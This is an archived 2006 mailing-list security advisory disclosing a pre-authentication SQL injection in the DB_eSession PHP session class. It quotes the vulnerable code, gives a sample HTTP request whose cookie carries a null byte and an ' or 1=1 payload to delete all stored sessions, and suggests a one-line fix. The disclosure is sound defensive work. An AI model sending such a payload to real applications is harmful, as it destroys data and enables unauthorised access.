lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <43EE544F.2080203@gulftech.org>
Date: Sat, 11 Feb 2006 15:17:03 -0600
From: GulfTech Security Research <security@...ftech.org>
To: bugtraq@...urityfocus.com, Secunia Research <vuln@...unia.com>,
	moderators@...db.org
Subject: DB_eSession deleteSession() SQL injection


##########################################################
# GulfTech Security Research            February 11, 2006
##########################################################
# Vendor : Lawrence Osiris
# URL : http://www.phpclasses.org/browse/package/1624.html
# Version : DB_eSession 1.0.2
# Risk : SQL Injection
##########################################################


Description:
DB_eSession is a feature-packed PHP class that stores the
session data in a MySQL database rather than files. It is
powerful, designed with security in mind, and is easy to
utilize. The DB_eSession library is used in a number of
popular web applications, and private projects alike.
DB_eSession is vulnerable to SQL Injection attacks due to
unsafe use of cookie data in an SQL query, and can allow an
attacker to craft malicious SQL Queries and have them then
successfully executed.



SQL Injection:
There is an SQL injection vulnerability in DB_eSession that
allow for an attacker to perform pre authentication SQL
Injection attacks against the vulnerable web application.

/**
* Try and save the current session ID if one is defined already.
*/
if (isSet($_COOKIE[$this->_sess_name]))
    $_sess_id_set = $_COOKIE[$this->_sess_name];
else
if (isSet($GLOBALS[$this->_sess_name]))
    $_sess_id_set = $GLOBALS[$this->_sess_name];
else
    $_sess_id_set = NULL;

The above code is from DB_eSession class @ lines 1080 - 1090
The variable $this->_sess_name is in most cases PHPSESSID, or
set to a developer specified value. You should be able to tell
from having a look at your cookies.

GET /example/index.php HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=143263645564654563456345634563435%00' or 1=1/*

The above request would successfully delete all of the sessions
in the database. The reason for the null byte is to get past
having the application die @ line 1134. Depending on what the
version of MySQL in use is, other attacks may be possible. The
root of this problem is that unsafe data is taken from a cookie
value and then passed to the deleteSession() function where it
is then used in an SQL query.



Solution:
The vendor was unresponsive to my contact attempts, but a fix is
not too difficult @ line 1092 add the following code below the
code shown @1080-1090

$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: addslashes($_sess_id_set);

This should effectively stop any SQL Injection attacks against the
vulnerable DB_eSession class.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00099-02112006


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ